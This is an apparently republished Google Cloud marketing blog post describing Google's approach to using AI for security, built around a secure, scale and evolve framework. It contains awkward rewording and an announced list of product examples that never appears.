How AI can improve digital security

AI is having a transformative moment and causing profound shifts in what’s possible with technology. It has the power to unlock the potential of communities, companies, and countries around the world, bringing meaningful and positive change that could improve billions of peoples’ lives. Similarly, as these technologies advance, they have the potential to vastly improve how we identify, address, and reduce security risks.

Google are at a key moment in our AI journey

Breakthroughs in generative AI are fundamentally changing how people interact with technology. At Google Cloud, we’re committed to helping developers and organizations stay on top of these developments. That’s why we recently announced new generative AI capabilities for our Google Cloud AI portfolio and committed to launching a range of products that responsibly infuse generative AI into our offerings. 

AI principles sit at the core of this work. Google were one of the first to introduce and advance responsible AI practices, and these principles serve as an ongoing commitment to our customers worldwide who rely on our products to build and grow their businesses safely.

One of the benefits of our experience using AI to solve real-world problems is that we have become better at helping secure new technologies as they become mainstream. At the same time, Google are leveraging recent AI advances to provide unique, up-to-date, and actionable threat intelligence, improving visibility across attack surfaces and infrastructure. Google know that improving cybersecurity is no longer a human-scale problem, and Google are excited about continuing to work together to prepare for what’s to come. 

Google work is rooted in a basic principle: AI can have a major impact for good on the security ecosystem, but only if Google are being bold and responsible about how Google deploy it. Google look at this investment like a digital immune system — when Google learn and adapt from previous risks to our digital health, our systems become better equipped to protect against, anticipate, and predict future attacks. To maximize the benefits of AI technologies and minimize risks, Google take a three-pronged approach to secure, scale, and evolve.

1. Secure: Helping organizations deploy AI systems themselves

Google are helping organizations deploy secure AI systems. Google approach AI systems in the same way we view other security challenges: we bake in industry-leading security features (often invisible to users) and secure by default protections to keep our users safe. This includes technical controls, contractual protections, and third-party verifications or attestations.

In addition, Google have standardized platforms and tools for machine learning that integrate with Google’s data protection, access control, and change management tools. Vertex AI, our machine learning platform for training and deploying ML models and AI applications, allows customers to train models without code and requires minimal expertise to address a broad range of modeling problems, including eliminating common mistakes, minimizing misconfigurations, and reducing attack surface. Vertex AI supplements our robust data governance platforms that control data gathering and classification, and we’re committed to the same data responsibilities for machine learning data that we have for conventional data processing.

2. Scale: Leveraging the power of AI to achieve better security outcomes

Google are continuing to launch cutting-edge, AI-powered products and services to help organizations achieve better security outcomes at scale. Historically, the security community has taken a reactionary approach to threats. While these efforts are important, they’re unsustainable. In today’s dynamic threat environment, organizations struggle to keep up with the pace and scope of attacks often leaving defenders feeling outmatched.

While AI technologies don’t offer a one-stop solution for all security problems, we’ve seen a few early use cases emerge for how AI is helping to level the security playing field:

Here are just some of the examples of how we currently use AI in our products to help relieve humans from the security burdens of incredibly dynamic systems: 

Together, these capabilities help organizations take Google’s AI and apply it to security challenges everywhere they operate.

3. Evolve: Adopting a future-state mindset to stay ahead of threats

Google are also constantly evolving to stay ahead of threats. AI technologies present novel security risks, and Google are working to understand those risks to better protect AI deployments from potential attacks. Google operate from the basic assumption that attackers will seek out these technologies and attempt to use them to circumvent defenses, and Google are building towards that future state. This includes advancing progress on important topics on the horizon like post-quantum cryptography and how to detect efforts to evade voice-verification via synthetic speech, staying on top of research into adversarial attacks on machine learning and AI systems and partnering with customers to develop best practices, tools, and threat models that address typical AI interactions and risks.

As far back as 2011, for example, Google began using machine learning to detect potential attackers on our internal networks. Today, with investments in AI, Google are able to detect our own Red Team attempting to attack our internal systems, and Google continue to collaborate with research teams to perform red team attacks on and using the latest AI developments. 

Related posts

How to get started with new Gemini model capabilities for Places API

by Cloud Ace Indonesia
1 week ago

Package Management for Debian/Ubuntu Operating Systems on Google Cloud

by Kartika Triyanti
2 years ago

Announcing general availability of Cloud Armor’s new edge security policies, and support for proxy load balancers

by Kartika Triyanti
2 years ago